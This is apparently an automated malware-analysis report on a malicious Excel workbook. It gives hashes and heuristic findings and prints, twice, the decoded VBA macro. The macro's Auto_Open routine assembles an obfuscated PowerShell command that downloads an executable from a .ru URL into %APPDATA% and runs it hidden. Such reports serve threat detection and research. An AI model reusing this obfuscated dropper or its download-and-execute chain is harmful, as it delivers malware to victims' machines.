Office (OLE) / .XLS malware analysis — malicious · e67f7ae242dffa6b

MALICIOUS

Office (OLE) / .XLS

76.5 KB Created: 2016-12-11 23:43:08 Authoring application: Microsoft Excel First seen: 2026-06-19

MD5: dc291fa09317ccd8c6e76bff2d3179e6 SHA-1: 12efeeeb1452c7ffeec511394193ba02e238021b SHA-256: e67f7ae242dffa6bdea778de46699b0cf7540e68e9fe375623bbd2fa621c4285

130 Risk Score

Heuristics 5

VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA
Matched line in script
```
Shell ehyhgo, vbHide
```
Payload URL assembled from a Chr()/Asc() string expression (1 URL) high OLE_VBA_EXPR_DROPPER_URL

A VBA macro builds its stage-2 download URL character by character from string literals concatenated with Chr()/Asc()/StrReverse() results — often nested (Chr(Asc(Chr(Asc("h")))) = "h") and split across the + and & operators, sometimes written out via Print #n, into a second-stage VBScript/PowerShell file. The URL is assembled at run time and never appears contiguously on disk, and there is no numeric array to brute-force, so a literal scan and the array recoverers both miss it. A bounded expression evaluator resolved it; surfaced as an IOC. Self-validating: only a valid host URL that is not already present verbatim in the macro is reported, so a benign macro cannot false-positive.
Auto_Open macro low OLE_VBA_AUTO

Auto_Open macro
Matched line in script
```
Sub Auto_Open()
```
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://mts2015stm.ru/12122016.exe Referenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9533 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	9533 bytes
SHA-256: `e3932f7e181cf1d2209a3ea8a15dd5a28fe09711d6d5a6ff49b253fa41cd4d33`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet2" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet3" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "tmp12DB" Function izagvoq() ypmusarf = "hbonjushoc" zkirukz = "e^w" uhisdah = "ibibbikhi" izagvoq = zkirukz End Function Function ukan() jruvxu = "vuhcyplug" uzfatu = " hi" defamso = "xfazuhw" ukan = uzfatu End Function Function luljy() pisry = "ggero" bpilcew = "^(^" idatnyv = "owypusmirp" luljy = bpilcew End Function Function ujzib() ewuw = "dyxse" onlaza = ")^." owqidyp = "orunanrend" ujzib = onlaza End Function Function axupa() xaqolce = "ivowxoz" burobz = "a%." ugsyjj = "izabjirugv" axupa = burobz End Function Function tvapro() exupy = "qelkobago" ilxybd = "^m." wkoby = "yrmyfy" tvapro = ilxybd End Function Function svopyha() ojylco = "cerdyhd" imsysj = "h^e" vmofziq = "fesmepno" svopyha = imsysj End Function Function uzumpoqr() ejlidmo = "abosoluk" ubyledc = "^n^" htutziky = "ekuwuxmo" uzumpoqr = ubyledc End Function Function xipysw() necijre = "dgoxmaguf" uwzibw = "w^N" xuje = "ebqila" xipysw = uwzibw End Function Function baqeb() adjoxe = "sofqivkorx" byjhanwy = ".eX" imtusxyk = "tyknywoghi" baqeb = byjhanwy End Function Function xpigso() lazjagco = "lhefomlimj" jtenjadh = "oNp" mepgojna = "ytecirg" xpigso = jtenjadh End Function Function pedyz() opihucd = "efuw" lumetto = "ByP" esumni = "ijbyjukwycd" pedyz = lumetto End Function Function imjufyj() kbehetva = "hiqzi" fopyjm = "015" atacibf = "ijremi" imjufyj = fopyjm End Function Function memu() uwkypca = "asqydpuhjew" mlungo = "stm" irepqyf = "akuzrugonw" memu = mlungo End Function Function edadi() uqtagny = "nyzuwdo" yzeppivk = "lIE" anximx = "odeqdyf" edadi = yzeppivk End Function Function owlod() nesors = "ixtexulqu" oddycre = "-Ex" rhywefl = "figviqo" owlod = oddycre End Function Function ihuvq() ohogufx = "raxyspe" opar = "ocE" igocogx = "afjuzz" ihuvq = opar End Function Function ecinegp() ispes = "athiwfop" likkumzo = "-pr" kpopgyni = "uvjebzexfu" ecinegp = likkumzo End Function Function mlipsu() oliky = "umguxoqd" glezufu = " (" ibdyx = "otbyze" mlipsu = glezufu End Function Function qxyci() apihso = "igjisa" vfuryrv = "Ol^" blalpigy = "ivsocu" qxyci = vfuryrv End Function Function ekcuv() ehicxa = "innijh" ryrdyda = "Ndo" yjoh = "iqoxcezid" ekcuv = ryrdyda End Function Function apmujeck() kavfyro = "nbalylmygk" uzodtogs = "^lL" ahijki = "uvipys" apmujeck = uzodtogs End Function Function apucupc() chincakre = "livoter" escydju = "T^E" sompy = "ihcelcumahn" apucupc = escydju End Function Function ankane() harag = "okanke" ocojzy = "D^f" kbuqaqro = "wpovxijudh" ankane = ocojzy End Function Function owipwev() ydylqer = "ijsuhe" injecce = " -" ukqywy = "qrujaze" owipwev = injecce End Function Function wbylfuhje() icdobpybb = "vysuto" fbyhohy = "^s^" ajaj = "qoqala" wbylfuhje = fbyhohy End Function Function ipafuf() yhylyn = "alemi" otcoklo = "/12" fivah = "ifrickytg" ipafuf = otcoklo End Function Function wapif() byzlibe = "nivqo" efokyj = ".ru" fnalcy = "jridyf" wapif = efokyj End Function Function rharnirc() vugjopru = "ewefny" evexiqm = "^ " zaqqu = "oxupral" rharnirc = evexiqm End Function Function inynci() cnodo = "tteja" daxse = "E /" gakgydo = "omdahqakt" inynci = daxse End Function Function qykxanv() omypi = "axibewf" gerode = "-^O" inbedmi = "icwijmo" qykxanv = gerode End Function Function wado() oxpar = "elguj" xoliw = "ROf" yjluvd = "ygofa" wado = xoliw End Function Function devkany() izygqanl = "vecu" egqih = "016" ugzelme = "muripy" devkany = egqih End Function Function jjizij() yxgexpy = "vxetbud" bpaltecru = "a%." rmahug = "ixjasby" jjizij = bpaltecru End Function Function tmoqqar() qvogme = "tnisdisojra" cjohyfu = "^nE" ehxoth = "ubruffojbi" tmoqqar = cjohyfu End Function Function iweg() umjyxpe = "fmyslikhuhi" xvazqet = "^CT" dorcezg = "azjezx" iweg = xvazqet End Function Function jcurwa() paski = VarType(ActiveWindow.Caption) = 8 jcurwa = paski End Function Function janon() yzqihmu = "kekqaxqadn" kobe = " S" otop = "ccitjaqo" janon = kobe End Function Function ilgabj() doxnagi = "hzapatmo" yhjyt = "app" qzunyc = "ostejajfy" ilgabj = yhjyt End Function Function yqirhi() abykwi = "cvefwigoqru" ibufp = "'ht" ywcaca = "ylunogtigq" yqirhi = ibufp End Function Function huhbon() vofxig = "gpunjalr" lagpumho = "aRt" insijq = "zwadeqilh" huhbon = lagpumho End Function Function pcajy() cwodehha = "ufymud" sobzo = "iLE" udremxap = "usagaj" pcajy = sobzo End Function Function efyks() ilfiduk = "wcystogrohu" wizagzo = "s^S" khimve = "xlehewa" efyks = wizagzo End Function Function deldyq() arirqib = "xtulalfu" fakpin = " '%" pukcy = "kittymu" deldyq = fakpin End Function Function utvonhyn() vagyzs = "ryfuqu" zamnuhta = " " tibdy = "kapapu" utvonhyn = zamnuhta End Function Function uvcyqco() evaga = "gqosdu" hydmyvre = "apP" yrarzo = "yngirqo" uvcyqco = hydmyvre End Function Function ixip() yrul = "dqowav" axijq = "y^ " wugufc = "etycivw" ixip = axijq End Function Function yqfobpur() gduzkaw = "ilanebva" anpicxer = "tp:" zapbodki = "homa" yqfobpur = anpicxer End Function Function ihoni() apyqig = "vejtowha" aglefav = "T^." eqom = "ohyqjad" ihoni = aglefav End Function Function apvonku() ekani = "voqcyx" fcadymi = "');" sywyjj = "ovojybxilz" apvonku = fcadymi End Function Function ehyhgo() efok = "cMD" + ".ex" + inynci + "c """ + "pOw" + "e^r" + wbylfuhje + svopyha + apmujeck + baqeb + "E " + owlod + "ecu" + "T^i" + xpigso + qxyci + "ic^" + ixip + " " + pedyz + "as^" + "S " + owipwev + "NoP" + wado + pcajy + utvonhyn + "-wI" + ekcuv + "wsT" + "yL^" + "e " + ukan + "Dd^" + "en " + mlipsu + uzumpoqr + izagvoq + qykxanv + "BJE" + iweg + rharnirc + janon + "YS^" + apucupc + tvapro + tmoqqar + ihoni + "wEB" + "^C^" + edadi + "nT^" + ujzib + "dO^" + xipysw + "^Lo" + "^a^" + ankane + "IlE" + luljy + yqirhi + yqfobpur + "//m" + "ts2" + imjufyj + memu + wapif + ipafuf + "122" + devkany + ".ex" + "e'," + "^'%" + uvcyqco + "DAt" + axupa + "exe" + apvonku + "s^t" + huhbon + ecinegp + ihuvq + efyks + deldyq + ilgabj + "dAt" + jjizij + "Exe" + "'""" ehyhgo = efok End Function Sub egihiv() Dim ukmyq ukmyq = "uzunu" If 915 = 38 Then Dim znotkow znotkow = "ywuw" Rem oket ussi owxi End If Rem ape okalcotje tpukuwyxhe iftuf Rem ijge ovno ysxacu ywaxq kzaqwo If 967 = 617 Then Rem mamgixjez hgotu ' obinpavpoww kuqekzaja nibaz End If ' inywok otosbabaf yqma zbinv muzlyp If 761 = 188 Then Rem nlemqaml rtytyvxizga jdarnenqa yhybu lvoxheqloca End If If "cluru" = "lov" Then Rem rfign dup ezylpyz ' aroxaxe filsyne End If Select Case "exuki" Case "yhebq" Dim asurde asurde = False ' ozjemma uweb Rem tmahekzo utazo oqnegt ofymryfe mbarefsebd ' aku ofycnep kxirnujqotv ico jilbi cjivd uvixxe Case "uz" Rem gijr imom kolqipp ipoxly carjazi xgivbakmi Case "idaga" ' dlajizdobx ywfugxy bmoqculc ekgusq End Select Select Case "ocite" Case "vy" Rem sapyfkoma njun ixxavxucba kow iwuxhuq psimynb ' oqzevzuhmyxv ozcupta asy ' jetary Rem oqeset fpucxaj nnecvudmyfa grumky Case "ehte" Dim jeluqz jeluqz = 9389 Rem rucze faroz plujsejo ezifu cribmehtemo ' ipo Dim qsetykzi qsetykzi = True End Select Dim qlomwa qlomwa = #10/14/1981# Select Case "em" Case "iwa" Rem uqkeng End Select Dim ykgakkeqf ykgakkeqf = #9/20/1966# Dim uwbohi uwbohi = True ' haduzige bpicy If "ixor" = "umnex" Then Rem vgydhi zlidywvad ukide elifb ihpommu fepurcaje Dim vfuxante vfuxante = "5432" End If Select Case "zoq" Case "ma" Dim nynujdy nynujdy = #7/10/1994# Rem yvawpawwi iwguju rimc inkomeku foxuqv roski Dim nbabkico nbabkico = True ' ibvivfy yviv eqjeb nzyz Case "nxogpy" Dim kabi kabi = "ixy" Case "bo" Rem tuwy egenowquqq werisgucsu yjewf acqoskycjy qqiwijujp Rem kecqurcuq Dim ydemz ydemz = "woqsanf" Dim exult exult = "3271" End Select Select Case "hpa" Case "cix" Dim ipkevbu ipkevbu = "3247" Rem lydxa ykitzeg pasvyfmakc ajarliku pwalvolu fumtewzil mebfuqnezzu Rem ilekr wxana utascu umhomk osit cvopuju qawqobypze Dim uwtivb uwtivb = "azgivekq" End Select If jcurwa Then Shell ehyhgo, vbHide End If End Sub Sub Auto_Open() egihiv End Sub

SHA-256: e3932f7e181cf1d2209a3ea8a15dd5a28fe09711d6d5a6ff49b253fa41cd4d33

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "tmp12DB"

Function izagvoq()
ypmusarf = "hbonjushoc"
zkirukz = "e^w"
uhisdah = "ibibbikhi"
izagvoq = zkirukz
End Function
Function ukan()
jruvxu = "vuhcyplug"
uzfatu = " hi"
defamso = "xfazuhw"
ukan = uzfatu
End Function
Function luljy()
pisry = "ggero"
bpilcew = "^(^"
idatnyv = "owypusmirp"
luljy = bpilcew
End Function
Function ujzib()
ewuw = "dyxse"
onlaza = ")^."
owqidyp = "orunanrend"
ujzib = onlaza
End Function
Function axupa()
xaqolce = "ivowxoz"
burobz = "a%."
ugsyjj = "izabjirugv"
axupa = burobz
End Function
Function tvapro()
exupy = "qelkobago"
ilxybd = "^m."
wkoby = "yrmyfy"
tvapro = ilxybd
End Function
Function svopyha()
ojylco = "cerdyhd"
imsysj = "h^e"
vmofziq = "fesmepno"
svopyha = imsysj
End Function
Function uzumpoqr()
ejlidmo = "abosoluk"
ubyledc = "^n^"
htutziky = "ekuwuxmo"
uzumpoqr = ubyledc
End Function
Function xipysw()
necijre = "dgoxmaguf"
uwzibw = "w^N"
xuje = "ebqila"
xipysw = uwzibw
End Function
Function baqeb()
adjoxe = "sofqivkorx"
byjhanwy = ".eX"
imtusxyk = "tyknywoghi"
baqeb = byjhanwy
End Function
Function xpigso()
lazjagco = "lhefomlimj"
jtenjadh = "oNp"
mepgojna = "ytecirg"
xpigso = jtenjadh
End Function
Function pedyz()
opihucd = "efuw"
lumetto = "ByP"
esumni = "ijbyjukwycd"
pedyz = lumetto
End Function
Function imjufyj()
kbehetva = "hiqzi"
fopyjm = "015"
atacibf = "ijremi"
imjufyj = fopyjm
End Function
Function memu()
uwkypca = "asqydpuhjew"
mlungo = "stm"
irepqyf = "akuzrugonw"
memu = mlungo
End Function
Function edadi()
uqtagny = "nyzuwdo"
yzeppivk = "lIE"
anximx = "odeqdyf"
edadi = yzeppivk
End Function
Function owlod()
nesors = "ixtexulqu"
oddycre = "-Ex"
rhywefl = "figviqo"
owlod = oddycre
End Function
Function ihuvq()
ohogufx = "raxyspe"
opar = "ocE"
igocogx = "afjuzz"
ihuvq = opar
End Function
Function ecinegp()
ispes = "athiwfop"
likkumzo = "-pr"
kpopgyni = "uvjebzexfu"
ecinegp = likkumzo
End Function
Function mlipsu()
oliky = "umguxoqd"
glezufu = "  ("
ibdyx = "otbyze"
mlipsu = glezufu
End Function
Function qxyci()
apihso = "igjisa"
vfuryrv = "Ol^"
blalpigy = "ivsocu"
qxyci = vfuryrv
End Function
Function ekcuv()
ehicxa = "innijh"
ryrdyda = "Ndo"
yjoh = "iqoxcezid"
ekcuv = ryrdyda
End Function
Function apmujeck()
kavfyro = "nbalylmygk"
uzodtogs = "^lL"
ahijki = "uvipys"
apmujeck = uzodtogs
End Function
Function apucupc()
chincakre = "livoter"
escydju = "T^E"
sompy = "ihcelcumahn"
apucupc = escydju
End Function
Function ankane()
harag = "okanke"
ocojzy = "D^f"
kbuqaqro = "wpovxijudh"
ankane = ocojzy
End Function
Function owipwev()
ydylqer = "ijsuhe"
injecce = "  -"
ukqywy = "qrujaze"
owipwev = injecce
End Function
Function wbylfuhje()
icdobpybb = "vysuto"
fbyhohy = "^s^"
ajaj = "qoqala"
wbylfuhje = fbyhohy
End Function
Function ipafuf()
yhylyn = "alemi"
otcoklo = "/12"
fivah = "ifrickytg"
ipafuf = otcoklo
End Function
Function wapif()
byzlibe = "nivqo"
efokyj = ".ru"
fnalcy = "jridyf"
wapif = efokyj
End Function
Function rharnirc()
vugjopru = "ewefny"
evexiqm = "^  "
zaqqu = "oxupral"
rharnirc = evexiqm
End Function
Function inynci()
cnodo = "tteja"
daxse = "E /"
gakgydo = "omdahqakt"
inynci = daxse
End Function
Function qykxanv()
omypi = "axibewf"
gerode = "-^O"
inbedmi = "icwijmo"
qykxanv = gerode
End Function
Function wado()
oxpar = "elguj"
xoliw = "ROf"
yjluvd = "ygofa"
wado = xoliw
End Function
Function devkany()
izygqanl = "vecu"
egqih = "016"
ugzelme = "muripy"
devkany = egqih
End Function
Function jjizij()
yxgexpy = "vxetbud"
bpaltecru = "a%."
rmahug = "ixjasby"
jjizij = bpaltecru
End Function
Function tmoqqar()
qvogme = "tnisdisojra"
cjohyfu = "^nE"
ehxoth = "ubruffojbi"
tmoqqar = cjohyfu
End Function
Function iweg()
umjyxpe = "fmyslikhuhi"
xvazqet = "^CT"
dorcezg = "azjezx"
iweg = xvazqet
End Function
Function jcurwa()
paski = VarType(ActiveWindow.Caption) = 8
jcurwa = paski
End Function
Function janon()
yzqihmu = "kekqaxqadn"
kobe = "  S"
otop = "ccitjaqo"
janon = kobe
End Function
Function ilgabj()
doxnagi = "hzapatmo"
yhjyt = "app"
qzunyc = "ostejajfy"
ilgabj = yhjyt
End Function
Function yqirhi()
abykwi = "cvefwigoqru"
ibufp = "'ht"
ywcaca = "ylunogtigq"
yqirhi = ibufp
End Function
Function huhbon()
vofxig = "gpunjalr"
lagpumho = "aRt"
insijq = "zwadeqilh"
huhbon = lagpumho
End Function
Function pcajy()
cwodehha = "ufymud"
sobzo = "iLE"
udremxap = "usagaj"
pcajy = sobzo
End Function
Function efyks()
ilfiduk = "wcystogrohu"
wizagzo = "s^S"
khimve = "xlehewa"
efyks = wizagzo
End Function
Function deldyq()
arirqib = "xtulalfu"
fakpin = " '%"
pukcy = "kittymu"
deldyq = fakpin
End Function
Function utvonhyn()
vagyzs = "ryfuqu"
zamnuhta = "   "
tibdy = "kapapu"
utvonhyn = zamnuhta
End Function
Function uvcyqco()
evaga = "gqosdu"
hydmyvre = "apP"
yrarzo = "yngirqo"
uvcyqco = hydmyvre
End Function
Function ixip()
yrul = "dqowav"
axijq = "y^ "
wugufc = "etycivw"
ixip = axijq
End Function
Function yqfobpur()
gduzkaw = "ilanebva"
anpicxer = "tp:"
zapbodki = "homa"
yqfobpur = anpicxer
End Function
Function ihoni()
apyqig = "vejtowha"
aglefav = "T^."
eqom = "ohyqjad"
ihoni = aglefav
End Function
Function apvonku()
ekani = "voqcyx"
fcadymi = "');"
sywyjj = "ovojybxilz"
apvonku = fcadymi
End Function
Function ehyhgo()
efok = "cMD" + ".ex" + inynci + "c """ + "pOw" + "e^r" + wbylfuhje + svopyha + apmujeck + baqeb + "E  " + owlod + "ecu" + "T^i" + xpigso + qxyci + "ic^" + ixip + "   " + pedyz + "as^" + "S  " + owipwev + "NoP" + wado + pcajy + utvonhyn + "-wI" + ekcuv + "wsT" + "yL^" + "e  " + ukan + "Dd^" + "en " + mlipsu + uzumpoqr + izagvoq + qykxanv + "BJE" + iweg + rharnirc + janon + "YS^" + apucupc + tvapro + tmoqqar + ihoni + "wEB" + "^C^" + edadi + "nT^" + ujzib + "dO^" + xipysw + "^Lo" + "^a^" + ankane + "IlE" + luljy + yqirhi + yqfobpur + "//m" + "ts2" + imjufyj + memu + wapif + ipafuf + "122" + devkany + ".ex" + "e'," + "^'%" + uvcyqco + "DAt" + axupa + "exe" + apvonku + "s^t" + huhbon + ecinegp + ihuvq + efyks + deldyq + ilgabj + "dAt" + jjizij + "Exe" + "'"""
ehyhgo = efok
End Function
Sub egihiv()
Dim ukmyq
ukmyq = "uzunu"
If 915 = 38 Then
Dim znotkow
znotkow = "ywuw"
Rem oket ussi owxi
End If
Rem ape okalcotje tpukuwyxhe iftuf
Rem ijge ovno ysxacu ywaxq kzaqwo
If 967 = 617 Then
Rem mamgixjez hgotu
' obinpavpoww kuqekzaja nibaz
End If
' inywok otosbabaf yqma zbinv muzlyp
If 761 = 188 Then
Rem nlemqaml rtytyvxizga jdarnenqa yhybu lvoxheqloca
End If
If "cluru" = "lov" Then
Rem rfign dup ezylpyz
' aroxaxe filsyne
End If

Select Case "exuki"
Case "yhebq"
Dim asurde
asurde = False
' ozjemma uweb
Rem tmahekzo utazo oqnegt ofymryfe mbarefsebd
' aku ofycnep kxirnujqotv ico jilbi cjivd uvixxe
Case "uz"
Rem gijr imom kolqipp ipoxly carjazi xgivbakmi
Case "idaga"
' dlajizdobx ywfugxy bmoqculc ekgusq
End Select
Select Case "ocite"
Case "vy"
Rem sapyfkoma njun ixxavxucba kow iwuxhuq psimynb
' oqzevzuhmyxv ozcupta asy
' jetary
Rem oqeset fpucxaj nnecvudmyfa grumky
Case "ehte"
Dim jeluqz
jeluqz = 9389
Rem rucze faroz plujsejo ezifu cribmehtemo
' ipo
Dim qsetykzi
qsetykzi = True
End Select
Dim qlomwa
qlomwa = #10/14/1981#
Select Case "em"
Case "iwa"
Rem uqkeng
End Select
Dim ykgakkeqf
ykgakkeqf = #9/20/1966#
Dim uwbohi
uwbohi = True
' haduzige bpicy
If "ixor" = "umnex" Then
Rem vgydhi zlidywvad ukide elifb ihpommu fepurcaje
Dim vfuxante
vfuxante = "5432"
End If
Select Case "zoq"
Case "ma"
Dim nynujdy
nynujdy = #7/10/1994#
Rem yvawpawwi iwguju rimc inkomeku foxuqv roski
Dim nbabkico
nbabkico = True
' ibvivfy yviv eqjeb nzyz
Case "nxogpy"
Dim kabi
kabi = "ixy"
Case "bo"
Rem tuwy egenowquqq werisgucsu yjewf acqoskycjy qqiwijujp
Rem kecqurcuq
Dim ydemz
ydemz = "woqsanf"
Dim exult
exult = "3271"
End Select
Select Case "hpa"
Case "cix"
Dim ipkevbu
ipkevbu = "3247"
Rem lydxa ykitzeg pasvyfmakc ajarliku pwalvolu fumtewzil mebfuqnezzu
Rem ilekr wxana utascu umhomk osit cvopuju qawqobypze
Dim uwtivb
uwtivb = "azgivekq"
End Select
If jcurwa Then
Shell ehyhgo, vbHide
End If

End Sub
Sub Auto_Open()
egihiv
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.